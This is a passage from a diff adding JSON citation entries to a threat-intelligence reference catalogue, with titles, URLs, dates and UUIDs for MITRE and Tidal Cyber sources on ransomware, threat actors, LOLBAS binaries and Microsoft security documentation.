"2019-10-20T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/" + ], + "source": "MITRE", + "title": "McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo" + }, + "related": [], + "uuid": "288e94b3-a023-4b59-8b2a-25c469fb56a1", + "value": "McAfee REvil October 2019" + }, + { + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "date_published": "2019-10-02T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/" + ], + "source": "MITRE", + "title": "McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us" + }, + "related": [], + "uuid": "1bf961f2-dfa9-4ca3-9bf5-90c21755d783", + "value": "McAfee Sodinokibi October 2019" + }, + { + "description": "Li, H. (2013, November 5). McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office. Retrieved June 18, 2020.", + "meta": { + "date_accessed": "2020-06-18T00:00:00Z", + "date_published": "2013-11-05T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs-detects-zero-day-exploit-targeting-microsoft-office-2" + ], + "source": "MITRE", + "title": "McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office" + }, + "related": [], + "uuid": "c90ecd26-ce29-4c1d-b739-357b6d42f399", + "value": "McAfee Sandworm November 2013" + }, + { + "description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.", + "meta": { + "date_accessed": "2018-05-16T00:00:00Z", + "date_published": "2018-03-02T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + ], + "source": "MITRE", + "title": "McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups" + }, + "related": [], + "uuid": "e6f0f7b5-01fe-437f-a9c9-2ea054e7d69d", + "value": "McAfee Honeybee" + }, + { + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.", + "meta": { + "date_accessed": "2020-08-13T00:00:00Z", + "date_published": "2019-07-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/mcmd-malware-analysis" + ], + "source": "MITRE", + "title": "MCMD Malware Analysis" + }, + "related": [], + "uuid": "f7364cfc-5a3b-4538-80d0-cae65f3c6592", + "value": "Secureworks MCMD July 2019" + }, + { + "description": "Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "date_published": "2017-11-09T00:00:00Z", + "refs": [ + "https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/" + ], + "source": "MITRE", + "title": "MDM and the Kextpocalypse" + }, + "related": [], + "uuid": "57aeedda-2c32-404f-bead-fe6d213d7241", + "value": "Purves Kextpocalypse 2" + }, + { + "description": "Chell, D. PART 3: How I Met Your Beacon – Brute Ratel. Retrieved February 6, 2023.", + "meta": { + "date_accessed": "2023-02-06T00:00:00Z", + "refs": [ + "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/" + ], + "source": "MITRE", + "title": "MDSec Brute Ratel August 2022" + }, + "related": [], + "uuid": "dfd12595-0056-5b4a-b753-624fac1bb3a6", + "value": "MDSec Brute Ratel August 2022" + }, + { + "description": "Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.", + "meta": { + "date_accessed": "2017-12-27T00:00:00Z", + "date_published": "2017-12-15T00:00:00Z", + "refs": [ + "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing" + ], + "source": "MITRE", + "title": "Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies" + }, + "related": [], + "uuid": "aa7393ad-0760-4f27-a068-17beba17bbe3", + "value": "Secureworks NICKEL ACADEMY Dec 2017" + }, + { + "description": "Health Sector Cybersecurity Coordination Center (HC3). (2023, February 24). MedusaLocker Ransomware. Retrieved August 11, 2023.", + "meta": { + "date_accessed": "2023-08-11T00:00:00Z", + "date_published": "2023-02-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.hhs.gov/sites/default/files/medusalocker-ransomware-analyst-note.pdf" + ], + "source": "Tidal Cyber", + "title": "MedusaLocker Ransomware" + }, + "related": [], + "uuid": "49e314d6-5324-41e0-8bee-2b3e08d5e12f", + "value": "HC3 Analyst Note MedusaLocker Ransomware February 2023" + }, + { + "description": "Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.", + "meta": { + "date_accessed": "2021-06-23T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/medusalocker-ransomware" + ], + "source": "MITRE", + "title": "MedusaLocker Ransomware" + }, + "related": [], + "uuid": "f7b41120-8455-409f-ad9c-815c2c43edfd", + "value": "Cybereason Nocturnus MedusaLocker 2020" + }, + { + "description": "Lawrence Abrams. (2023, March 12). Medusa ransomware gang picks up steam as it targets companies worldwide. Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "date_published": "2023-03-12T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.bleepingcomputer.com/news/security/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-worldwide/" + ], + "source": "Tidal Cyber", + "title": "Medusa ransomware gang picks up steam as it targets companies worldwide" + }, + "related": [], + "uuid": "21fe1d9e-17f1-49e2-b05f-78e9160f5414", + "value": "Bleeping Computer Medusa Ransomware March 12 2023" + }, + { + "description": "Lyngaas, S. (2021, February 4). Meet Babuk, a ransomware attacker blamed for the Serco breach. Retrieved August 11, 2021.", + "meta": { + "date_accessed": "2021-08-11T00:00:00Z", + "date_published": "2021-02-04T00:00:00Z", + "refs": [ + "https://www.cyberscoop.com/babuk-ransomware-serco-attack/" + ], + "source": "MITRE", + "title": "Meet Babuk, a ransomware attacker blamed for the Serco breach" + }, + "related": [], + "uuid": "0a0aeacd-0976-4c84-b40d-5704afca9f0e", + "value": "CyberScoop Babuk February 2021" + }, + { + "description": "Meyers, Adam. (2018, April 6). Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2018-04-06T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/" + ], + "source": "MITRE", + "title": "Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA" + }, + "related": [], + "uuid": "a0119ad4-ceea-4dba-bc08-a682085a9b27", + "value": "CrowdStrike Stardust Chollima Profile April 2018" + }, + { + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "meta": { + "date_accessed": "2018-05-22T00:00:00Z", + "date_published": "2018-01-19T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + ], + "source": "MITRE", + "title": "Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR" + }, + "related": [], + "uuid": "ce07d409-292d-4e8e-b1af-bd5ba46c1b95", + "value": "CrowdStrike VOODOO BEAR" + }, + { + "description": "Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.", + "meta": { + "date_accessed": "2021-04-12T00:00:00Z", + "date_published": "2018-06-15T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA" + }, + "related": [], + "uuid": "35e72170-b1ec-49c9-aefe-a24fc4302fa6", + "value": "Crowdstrike MUSTANG PANDA June 2018" + }, + { + "description": "Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.", + "meta": { + "date_accessed": "2018-05-16T00:00:00Z", + "date_published": "2018-03-12T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/" + ], + "source": "MITRE", + "title": "Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR" + }, + "related": [], + "uuid": "ee400057-2b26-4464-96b4-484c9eb9d5c2", + "value": "CrowdStrike VENOMOUS BEAR" + }, + { + "description": "Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.", + "meta": { + "date_accessed": "2018-12-18T00:00:00Z", + "date_published": "2018-11-27T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" + ], + "source": "MITRE", + "title": "Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN" + }, + "related": [], + "uuid": "3fc0d7ad-6283-4cfd-b72f-5ce47594531e", + "value": "Crowdstrike Helix Kitten Nov 2018" + }, + { + "description": "Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.", + "meta": { + "date_accessed": "2019-04-18T00:00:00Z", + "date_published": "2018-02-27T00:00:00Z", + "refs": [ + "https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/" + ], + "source": "MITRE", + "title": "Memcrashed - Major amplification attacks from UDP port 11211" + }, + "related": [], + "uuid": "a2a0c1eb-20ad-4c40-a8cd-1732fdde7e19", + "value": "Cloudflare Memcrashed Feb 2018" + }, + { + "description": "DiabloHorn. (2015, March 22). mempdump. Retrieved October 6, 2017.", + "meta": { + "date_accessed": "2017-10-06T00:00:00Z", + "date_published": "2015-03-22T00:00:00Z", + "refs": [ + "https://github.com/DiabloHorn/mempdump" + ], + "source": "MITRE", + "title": "mempdump" + }, + "related": [], + "uuid": "f830ed8b-33fa-4d1e-a66c-41f8c6aba69c", + "value": "Github Mempdump" + }, + { + "description": "Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2017-02-16T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/" + ], + "source": "MITRE, Tidal Cyber", + "title": "menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations" + }, + "related": [], + "uuid": "ba4f7d65-73ec-4726-b1f6-f2443ffda5e7", + "value": "Palo Alto menuPass Feb 2017" + }, + { + "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages?. Retrieved May 11, 2020.", + "meta": { + "date_accessed": "2020-05-11T00:00:00Z", + "date_published": "2019-10-31T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html" + ], + "source": "MITRE", + "title": "MESSAGETAP: Who’s Reading Your Text Messages?" + }, + "related": [], + "uuid": "f56380e8-3cfa-407c-a493-7f9e50ba3867", + "value": "FireEye MESSAGETAP October 2019" + }, + { + "description": "SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023.", + "meta": { + "date_accessed": "2023-04-04T00:00:00Z", + "date_published": "2022-09-22T00:00:00Z", + "refs": [ + "https://docs.google.com/document/d/1e9ZTW9b71YwFWS_18ZwDAxa-cYbV8q1wUefmKZLYVsA/edit#heading=h.lmnbtht1ikzm" + ], + "source": "MITRE", + "title": "Metador Technical Appendix" + }, + "related": [], + "uuid": "aa021076-e9c5-5428-a938-c10cfb6b7c97", + "value": "SentinelLabs Metador Technical Appendix Sept 2022" + }, + { + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.", + "meta": { + "date_accessed": "2020-07-30T00:00:00Z", + "date_published": "2018-04-24T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html" + ], + "source": "MITRE", + "title": "Metamorfo Campaigns Targeting Brazilian Users" + }, + "related": [], + "uuid": "fd220165-43c8-4aaf-9295-0a2b7a52929c", + "value": "FireEye Metamorfo Apr 2018" + }, + { + "description": "Metasploit. (n.d.). Retrieved December 4, 2014.", + "meta": { + "date_accessed": "2014-12-04T00:00:00Z", + "refs": [ + "http://www.metasploit.com" + ], + "source": "MITRE", + "title": "Metasploit_Ref" + }, + "related": [], + "uuid": "ab6ea6b3-3c71-4e69-9713-dae3e4446083", + "value": "Metasploit_Ref" + }, + { + "description": "undefined. (n.d.). Retrieved April 12, 2019.", + "meta": { + "date_accessed": "2019-04-12T00:00:00Z", + "refs": [ + "https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh" + ], + "source": "MITRE", + "title": "Metasploit SSH Module" + }, + "related": [], + "uuid": "e4ae69e5-67ba-4a3e-8101-5e7f073bd312", + "value": "Metasploit SSH Module" + }, + { + "description": "Rapid7. (2013, November 26). meterpreter/source/extensions/priv/server/elevate/. Retrieved July 8, 2018.", + "meta": { + "date_accessed": "2018-07-08T00:00:00Z", + "date_published": "2013-11-26T00:00:00Z", + "refs": [ + "https://github.com/rapid7/meterpreter/tree/master/source/extensions/priv/server/elevate" + ], + "source": "MITRE", + "title": "meterpreter/source/extensions/priv/server/elevate/" + }, + "related": [], + "uuid": "113dafad-8ede-424b-b727-66f71ea7806a", + "value": "Github Rapid7 Meterpreter Elevate" + }, + { + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "date_published": "2014-09-01T00:00:00Z", + "refs": [ + "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + ], + "source": "MITRE", + "title": "Methods of Malware Persistence on Mac OS X" + }, + "related": [], + "uuid": "44154472-2894-4161-b23f-46d1b1fd6772", + "value": "Methods of Mac Malware Persistence" + }, + { + "description": "Jessica Haworth. (2022, February 16). MFA fatigue attacks: Users tricked into allowing device access due to overload of push notifications. Retrieved March 31, 2022.", + "meta": { + "date_accessed": "2022-03-31T00:00:00Z", + "date_published": "2022-02-16T00:00:00Z", + "refs": [ + "https://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to-overload-of-push-notifications" + ], + "source": "MITRE", + "title": "MFA fatigue attacks: Users tricked into allowing device access due to overload of push notifications" + }, + "related": [], + "uuid": "1b7b0f00-71ba-4762-ae81-bce24591cff4", + "value": "MFA Fatigue Attacks - PortSwigger" + }, + { + "description": "LOLBAS. (2018, May 25). Mftrace.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/" + ], + "source": "Tidal Cyber", + "title": "Mftrace.exe" + }, + "related": [], + "uuid": "b6d42cc9-1bf0-4389-8654-90b8d4e7ff49", + "value": "Mftrace.exe - LOLBAS Project" + }, + { + "description": "Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.", + "meta": { + "date_accessed": "2018-11-13T00:00:00Z", + "date_published": "2018-07-25T00:00:00Z", + "refs": [ + "https://blog.radware.com/security/2018/07/micropsia-malware/" + ], + "source": "MITRE", + "title": "Micropsia Malware" + }, + "related": [], + "uuid": "8771ed60-eecb-4e0c-b22c-0c26d30d4dec", + "value": "Radware Micropsia July 2018" + }, + { + "description": "MSRC. (2024, January 19). Microsoft Actions Following Attack by Nation State Actor Midnight Blizzard. Retrieved January 24, 2024.", + "meta": { + "date_accessed": "2024-01-24T00:00:00Z", + "date_published": "2024-01-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/" + ], + "source": "Tidal Cyber", + "title": "Microsoft Actions Following Attack by Nation State Actor Midnight Blizzard" + }, + "related": [], + "uuid": "91b48ddd-9e3f-4d36-a262-3b52145b3db2", + "value": "Microsoft Midnight Blizzard January 19 2024" + }, + { + "description": "Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-12-19T00:00:00Z", + "refs": [ + "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/" + ], + "source": "MITRE", + "title": "Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats" + }, + "related": [], + "uuid": "99831838-fc8f-43fa-9c87-6ccdf5677c34", + "value": "Microsoft ZINC disruption Dec 2017" + }, + { + "description": "Ravie Lakshmanan. (2023, June 19). Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2023-06-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://thehackernews.com/2023/06/microsoft-blames-massive-ddos-attack.html" + ], + "source": "Tidal Cyber", + "title": "Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions" + }, + "related": [], + "uuid": "2ee27b55-b7a7-40a8-8c0b-5e28943cd273", + "value": "The Hacker News Microsoft DDoS June 19 2023" + }, + { + "description": "Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021.", + "meta": { + "date_accessed": "2021-12-13T00:00:00Z", + "date_published": "2021-06-14T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/" + ], + "source": "MITRE", + "title": "Microsoft delivers comprehensive solution to battle rise in consent phishing emails" + }, + "related": [], + "uuid": "393e44fe-cf52-4c39-a79f-f7cdd9d8e16a", + "value": "Microsoft OAuth 2.0 Consent Phishing 2021" + }, + { + "description": "Microsoft . (2020, September 29). Microsoft Digital Defense Report FY20. Retrieved April 21, 2021.", + "meta": { + "date_accessed": "2021-04-21T00:00:00Z", + "date_published": "2020-09-29T00:00:00Z", + "refs": [ + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Microsoft Digital Defense Report FY20" + }, + "related": [], + "uuid": "cdf74af5-ed71-4dfd-bc49-0ccfa40b65ea", + "value": "Microsoft Digital Defense FY20 Sept 2020" + }, + { + "description": "Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.", + "meta": { + "date_accessed": "2017-12-19T00:00:00Z", + "date_published": "2017-12-15T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/" + ], + "source": "MITRE", + "title": "Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks" + }, + "related": [], + "uuid": "d6f93310-77b6-491e-ba9d-ec1faf8de7e4", + "value": "BleepingComputer DDE Disabled in Word Dec 2017" + }, + { + "description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.", + "meta": { + "date_accessed": "2017-04-25T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx" + ], + "source": "MITRE", + "title": "Microsoft DuplicateTokenEx" + }, + "related": [], + "uuid": "8a389e76-d43a-477c-aab4-301c7c55b439", + "value": "Microsoft DuplicateTokenEx" + }, + { + "description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.", + "meta": { + "date_accessed": "2017-10-27T00:00:00Z", + "date_published": "2015-08-14T00:00:00Z", + "refs": [ + "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/" + ], + "source": "MITRE", + "title": "Microsoft HTML Application (HTA) Abuse, Part Deux" + }, + "related": [], + "uuid": "39b1cb2f-a07b-49f2-bf2c-15f0c9b95772", + "value": "Red Canary HTA Abuse Part Deux" + }, + { + "description": "Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.", + "meta": { + "date_accessed": "2018-10-03T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk" + ], + "source": "MITRE", + "title": "Microsoft HTML Help 1.4" + }, + "related": [], + "uuid": "f9daf15d-61ea-4cfa-a4e8-9d33d1acd28f", + "value": "Microsoft HTML Help May 2018" + }, + { + "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2019-08-27T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens" + ], + "source": "MITRE", + "title": "Microsoft identity platform access tokens" + }, + "related": [], + "uuid": "a39d976e-9b52-48f3-b5db-0ffd84ecd338", + "value": "Microsoft Identity Platform Access 2019" + }, + { + "description": "Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "date_published": "2019-08-29T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens" + ], + "source": "MITRE", + "title": "Microsoft identity platform access tokens" + }, + "related": [], + "uuid": "44767d53-8cd7-44dd-a69d-8a7bebc1d87d", + "value": "Microsoft - Azure AD Identity Tokens - Aug 2019" + }, + { + "description": "Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow" + ], + "source": "MITRE", + "title": "Microsoft identity platform and OAuth 2.0 authorization code flow" + }, + "related": [], + "uuid": "a41c2123-8b8d-4f98-a535-e58e3e746b69", + "value": "Microsoft - OAuth Code Authorization flow - June 2019" + }, + { + "description": "Microsoft. (n.d.). Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols" + ], + "source": "MITRE", + "title": "Microsoft Identity Platform Protocols May 2019" + }, + "related": [], + "uuid": "a99d2292-be39-4e55-a952-30c9d6a3d0a3", + "value": "Microsoft Identity Platform Protocols May 2019" + }, + { + "description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.", + "meta": { + "date_accessed": "2017-04-25T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx" + ], + "source": "MITRE", + "title": "Microsoft ImpersonateLoggedOnUser" + }, + "related": [], + "uuid": "01f5176a-cce6-46e2-acce-a77b6bea7172", + "value": "Microsoft ImpersonateLoggedOnUser" + }, + { + "description": "MSRC Team. (2021, February 18). Microsoft Internal Solorigate Investigation – Final Update. Retrieved May 14, 2021.", + "meta": { + "date_accessed": "2021-05-14T00:00:00Z", + "date_published": "2021-02-18T00:00:00Z", + "refs": [ + "https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate-investigation-final-update/" + ], + "source": "MITRE", + "title": "Microsoft Internal Solorigate Investigation – Final Update" + }, + "related": [], + "uuid": "66cade99-0040-464c-98a6-bba57719f0a4", + "value": "Microsoft Internal Solorigate Investigation Blog" + }, + { + "description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.", + "meta": { + "date_accessed": "2017-04-25T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx" + ], + "source": "MITRE", + "title": "Microsoft LogonUser" + }, + "related": [], + "uuid": "08088ec0-5b48-4c32-b213-5e029e5f83ee", + "value": "Microsoft LogonUser" + }, + { + "description": "Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.", + "meta": { + "date_accessed": "2021-09-24T00:00:00Z", + "date_published": "2019-06-11T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/" + ], + "source": "MITRE", + "title": "Microsoft Management Console (MMC) Vulnerabilities" + }, + "related": [], + "uuid": "7bcf1c90-6299-448b-92c3-a6702882936a", + "value": "mmc_vulns" + }, + { + "description": "LOLBAS. (2022, January 20). Microsoft.NodejsTools.PressAnyKey.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-01-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/" + ], + "source": "Tidal Cyber", + "title": "Microsoft.NodejsTools.PressAnyKey.exe" + }, + "related": [], + "uuid": "25c46948-a648-4c3c-b442-e700df68fa20", + "value": "Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project" + }, + { + "description": "Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.", + "meta": { + "date_accessed": "2018-07-31T00:00:00Z", + "date_published": "2018-06-26T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" + ], + "source": "MITRE", + "title": "Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign" + }, + "related": [], + "uuid": "501057e2-9a31-46fe-aaa0-427218682153", + "value": "FireEye FELIXROOT July 2018" + }, + { + "description": "Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "date_published": "2017-04-30T00:00:00Z", + "refs": [ + "https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims" + ], + "source": "MITRE", + "title": "Microsoft Patch Analysis for Exploitation" + }, + "related": [], + "uuid": "ce11568a-36a8-4da2-972f-9cd67cc337d8", + "value": "Irongeek Sims BSides 2017" + }, + { + "description": "Microsoft. (2021, August 23). Retrieved August 16, 2021.", + "meta": { + "date_accessed": "2021-08-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules" + ], + "source": "MITRE", + "title": "Microsoft_rec_block_rules" + }, + "related": [], + "uuid": "8fbc12b4-dec6-4913-9103-b28b5c3395ee", + "value": "Microsoft_rec_block_rules" + }, + { + "description": "Coulter, D. et al.. (2019, April 9). Microsoft recommended block rules. Retrieved August 12, 2021.", + "meta": { + "date_accessed": "2021-08-12T00:00:00Z", + "date_published": "2019-04-09T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules" + ], + "source": "MITRE", + "title": "Microsoft recommended block rules" + }, + "related": [], + "uuid": "86955cd2-5980-44ba-aa7b-4b9f8e347730", + "value": "Microsoft WDAC" + }, + { + "description": "Jordan Geurten et al. . (2022, March 29). Microsoft recommended driver block rules. Retrieved April 7, 2022.", + "meta": { + "date_accessed": "2022-04-07T00:00:00Z", + "date_published": "2022-03-29T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules" + ], + "source": "MITRE", + "title": "Microsoft recommended driver block rules" + }, + "related": [], + "uuid": "9bb5c330-56bd-47e7-8414-729d8e6cb3b3", + "value": "Microsoft driver block rules" + }, + { + "description": "Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021.", + "meta": { + "date_accessed": "2021-03-16T00:00:00Z", + "date_published": "2020-10-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules" + ], + "source": "MITRE", + "title": "Microsoft recommended driver block rules" + }, + "related": [], + "uuid": "2ad8414a-4490-4896-8266-556b8bdbb77f", + "value": "Microsoft Driver Block Rules" + }, + { + "description": "Microsoft. (n.d.). Retrieved January 24, 2020.", + "meta": { + "date_accessed": "2020-01-24T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1" + 